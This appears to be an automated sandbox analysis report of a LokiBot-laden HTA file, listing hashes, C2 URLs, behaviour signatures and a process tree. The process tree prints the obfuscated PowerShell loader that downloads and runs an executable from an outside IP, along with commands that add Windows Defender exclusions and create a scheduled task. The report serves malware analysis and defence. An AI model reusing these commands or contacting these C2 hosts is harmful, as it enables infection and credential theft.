Analysis

  • max time kernel
    129s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2024 18:00

General

  • Target

    seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta

  • Size

    178KB

  • MD5

    51ff32b18625da8e57f2b01773842cfe

  • SHA1

    5a67dd2a7f6e75324129678af99b09936bc5e2e9

  • SHA256

    b32a47004e6134879604cb3246c89b351bc5fb2547b1d87070846c5719951727

  • SHA512

    6ae49faacd42c43f288560d3cc77929e7b5465a522bdff6838df5d8f7ebc9228091e2279e9e63c008456e3c467033188a0e68234a38e8016c994b3c5eb1c8d6a

  • SSDEEP

    96:4vCl17nf2iLZ62iLqG4SPwYNf6hzhs2iL0Y5Q:4vCldnf2iLZ62iLISWs2iL0Y5Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Windows\SysWOW64\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE
      "C:\Windows\SysTEm32\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE" "PoWErShELl.EXe -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt ; iNvoke-eXPrEssion($(iNvoKe-ExprESsiOn('[syStEm.TExT.eNCOdING]'+[cHAR]58+[CHar]58+'Utf8.gEtsTrING([SySTeM.CoNVERt]'+[char]58+[Char]58+'fromBAse64StrIng('+[char]34+'JEtQeWw1UEl4REFxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlUmRlRklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVwR2NKekppUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdtRWZCcVZKd2IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT2hlbmlXY0dJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWNLZGFobmZjYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1dTdUFVSGV4bSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkS1B5bDVQSXhEQXE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzM2L2Nhc3BvbC5leGUiLCIkZW5WOkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzdGFSVC1TbGVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHAr]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3876
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lnvsmflu\lnvsmflu.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4324
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC505.tmp" "c:\Users\Admin\AppData\Local\Temp\lnvsmflu\CSCCC4A54A1CAEF4007B7D3BBEE242E6CD.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3408
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4232
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4728
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\bdWEysRwjYwmy.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3992
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bdWEysRwjYwmy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4CF2.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2860
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:4972

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwerSHELL.ExE.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    d8d0e2d32817afffae265fe50d0ccd9a

    SHA1

    f16a5dd16c019045bf79cf27b208bb5c7f2ec4b4

    SHA256

    d284c527b7ba83e120ad2588480a5a741dcec4b03e15698ebeba72f24db5d258

    SHA512

    f0c622e537dff62cb8cc52c300f6ee6ef06d41f6a04ab730d546199b5ca29b4bf912e58eb1bd9117ce8e5e228234cfb6bbb4eebfdf7b10c4b440ccd8b4c54806

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    92cf3bb06eb7bfa18716b6ff52662810

    SHA1

    4578aa7f0d8e6e6a579512282409847a13d90025

    SHA256

    3089457fb6f4c7258cfa014153e7585deb2a2b613864cd1faba36562292d10c0

    SHA512

    d13e92017bd60862ec4ece501bd2cdff3373baf2dceee7ff63ea8fdd4765dd621ae35d2f7964cb167323d002b755d5b689fb51be39179f4d088ea438064f3a6b

  • C:\Users\Admin\AppData\Local\Temp\RESC505.tmp

    Filesize

    1KB

    MD5

    01295e7e2f730266c0727617b1c9a4a4

    SHA1

    cd703f57ea333b872669d7c63e0f1bceade12a3a

    SHA256

    a9b7da9f70318191496b939b5b75446da91c98538f05c10b91405bcc00d33994

    SHA512

    7f0acc119bb70a87bd6665176e4ba713d45d3aa1472120496e416cc2e0f5941dbab5e8c3319f1395516df2d7d450a3d1581b025b32ffc55967ff8a73c38963f6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5aanprex.bmc.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\lnvsmflu\lnvsmflu.dll

    Filesize

    3KB

    MD5

    b88f2e61744d62356dc489969abf4638

    SHA1

    7589adae75cd019a07c919fc4c6baee18a6a30d9

    SHA256

    e14d9f75822ceee7a20ccd34395835d89522b5b33228a64acb2559c94aeca344

    SHA512

    9b61d1644baaa62891e842dddb87725631fb80ee00ba7ec4a7607d7325b1fb43cd3601ea3723d9ab23ecf35bcc0a00d71b38debc69f9dfc889bfcbebce9fb7ed

  • C:\Users\Admin\AppData\Local\Temp\tmp4CF2.tmp

    Filesize

    1KB

    MD5

    5fb904b4d09e02215cf6e434e38222bc

    SHA1

    0306b79d60957a94f11b8047015ef74de60153fa

    SHA256

    d2ee2cf2cf483607272fb918ae70436545de79f80e993e8856e8234f375d8322

    SHA512

    143588915178c795192bf18adec8586dcefff5d1aff0351e472990700dbec7ebde6b0b26d31be29b4ba12062c6ce74a42a1a65af341f754f8e8fc24e5e22a9df

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    497KB

    MD5

    8c34e99269d4121a0dfe4c3eaa9e269f

    SHA1

    5bbaa7dc726324e057eb4f78856c368488c4805a

    SHA256

    2899cb71414f7d46a6be0d40a5ba017d407a41f291154ea6a86f421754d11a76

    SHA512

    99f3cc287b9437ee888371fac3cf37d77d39c9468086feb0c80f4a0a4cc8a750c0b2798ec32a90aea3c88ed67c36005bcfd81d8e439edcdaca9e60caa1f3f277

  • \??\c:\Users\Admin\AppData\Local\Temp\lnvsmflu\CSCCC4A54A1CAEF4007B7D3BBEE242E6CD.TMP

    Filesize

    652B

    MD5

    3a332dbedbefaa5194e90ffb678b702f

    SHA1

    76cf6414ecd2ab0159e69453202b01e5588cb176

    SHA256

    a29b9e552ad95fce107b5b559dbe058b302674ea9a5cc2acf1d32274e980a72d

    SHA512

    b277342532a3a64706faf0b9c67558e5fa684079f8c65e134c8084f755b94f882869a88015064a365c9068b49a7ac1a956f2cb5c7355f0b5160ba5b8e33717f5

  • \??\c:\Users\Admin\AppData\Local\Temp\lnvsmflu\lnvsmflu.0.cs

    Filesize

    487B

    MD5

    ee60617752b2061187e3773f962ff810

    SHA1

    5d3dc400820671b51499e9003fcbd7794d07e315

    SHA256

    69736289404f9f61bb67a99a24945aaa347591458b09f4dd686bbc58d8b25ce9

    SHA512

    5bf701c77b31bcf3421fa2cc4649127b54656175bdfb238ddca8606063ceec69fd76d2f611b5f55f246a3003d3fd76b1b318fa0fc4cb1b10d9b8b04e153bf231

  • \??\c:\Users\Admin\AppData\Local\Temp\lnvsmflu\lnvsmflu.cmdline

    Filesize

    369B

    MD5

    d94aa32a9a87736f334f5b9c7e9ea64d

    SHA1

    4f917af40e91531bc9d2b9bbc922cd1a5e33f89e

    SHA256

    c70dbd5b4d989899b534a5d1c73c48998c3eb43c31bf637074605f6a5a6923c1

    SHA512

    729dcdc1423a6b0a48d59ca8b03f0cd75a90a6a6dba61a37b996e1be7d1bc4deb6c659d4e88620df99d8a0baa27077a6926f22b607be6da6900522129ace70fd

  • memory/2360-0-0x000000007113E000-0x000000007113F000-memory.dmp

    Filesize

    4KB

  • memory/2360-5-0x00000000053A0000-0x00000000053C2000-memory.dmp

    Filesize

    136KB

  • memory/2360-18-0x0000000006350000-0x000000000636E000-memory.dmp

    Filesize

    120KB

  • memory/2360-17-0x0000000005E90000-0x00000000061E4000-memory.dmp

    Filesize

    3.3MB

  • memory/2360-83-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

  • memory/2360-6-0x0000000005CB0000-0x0000000005D16000-memory.dmp

    Filesize

    408KB

  • memory/2360-7-0x0000000005D20000-0x0000000005D86000-memory.dmp

    Filesize

    408KB

  • memory/2360-19-0x0000000006390000-0x00000000063DC000-memory.dmp

    Filesize

    304KB

  • memory/2360-73-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

  • memory/2360-72-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

  • memory/2360-67-0x000000007113E000-0x000000007113F000-memory.dmp

    Filesize

    4KB

  • memory/2360-65-0x00000000068F0000-0x00000000068F8000-memory.dmp

    Filesize

    32KB

  • memory/2360-4-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

  • memory/2360-2-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

  • memory/2360-3-0x0000000005580000-0x0000000005BA8000-memory.dmp

    Filesize

    6.2MB

  • memory/2360-1-0x0000000002A30000-0x0000000002A66000-memory.dmp

    Filesize

    216KB

  • memory/3876-30-0x000000006D9F0000-0x000000006DA3C000-memory.dmp

    Filesize

    304KB

  • memory/3876-45-0x0000000007080000-0x0000000007116000-memory.dmp

    Filesize

    600KB

  • memory/3876-49-0x0000000007140000-0x000000000715A000-memory.dmp

    Filesize

    104KB

  • memory/3876-48-0x0000000007040000-0x0000000007054000-memory.dmp

    Filesize

    80KB

  • memory/3876-47-0x0000000007030000-0x000000000703E000-memory.dmp

    Filesize

    56KB

  • memory/3876-46-0x0000000007000000-0x0000000007011000-memory.dmp

    Filesize

    68KB

  • memory/3876-29-0x0000000006AB0000-0x0000000006AE2000-memory.dmp

    Filesize

    200KB

  • memory/3876-50-0x0000000007120000-0x0000000007128000-memory.dmp

    Filesize

    32KB

  • memory/3876-44-0x0000000006E70000-0x0000000006E7A000-memory.dmp

    Filesize

    40KB

  • memory/3876-43-0x0000000006E00000-0x0000000006E1A000-memory.dmp

    Filesize

    104KB

  • memory/3876-40-0x00000000060A0000-0x00000000060BE000-memory.dmp

    Filesize

    120KB

  • memory/3876-41-0x0000000006CF0000-0x0000000006D93000-memory.dmp

    Filesize

    652KB

  • memory/3876-42-0x0000000007440000-0x0000000007ABA000-memory.dmp

    Filesize

    6.5MB

  • memory/3992-131-0x000000006DFD0000-0x000000006E01C000-memory.dmp

    Filesize

    304KB

  • memory/4232-89-0x0000000006A10000-0x0000000006A74000-memory.dmp

    Filesize

    400KB

  • memory/4232-86-0x0000000005230000-0x000000000523A000-memory.dmp

    Filesize

    40KB

  • memory/4232-82-0x0000000000740000-0x00000000007C2000-memory.dmp

    Filesize

    520KB

  • memory/4232-87-0x0000000005300000-0x000000000539C000-memory.dmp

    Filesize

    624KB

  • memory/4232-84-0x0000000005570000-0x0000000005B14000-memory.dmp

    Filesize

    5.6MB

  • memory/4232-85-0x0000000005070000-0x0000000005102000-memory.dmp

    Filesize

    584KB

  • memory/4232-88-0x0000000005550000-0x0000000005562000-memory.dmp

    Filesize

    72KB

  • memory/4728-144-0x0000000007780000-0x0000000007791000-memory.dmp

    Filesize

    68KB

  • memory/4728-130-0x0000000007480000-0x0000000007523000-memory.dmp

    Filesize

    652KB

  • memory/4728-120-0x000000006DFD0000-0x000000006E01C000-memory.dmp

    Filesize

    304KB

  • memory/4728-119-0x0000000006770000-0x00000000067BC000-memory.dmp

    Filesize

    304KB

  • memory/4728-145-0x00000000077C0000-0x00000000077D4000-memory.dmp

    Filesize

    80KB

  • memory/4728-94-0x0000000005BC0000-0x0000000005F14000-memory.dmp

    Filesize

    3.3MB

  • memory/4972-116-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4972-114-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB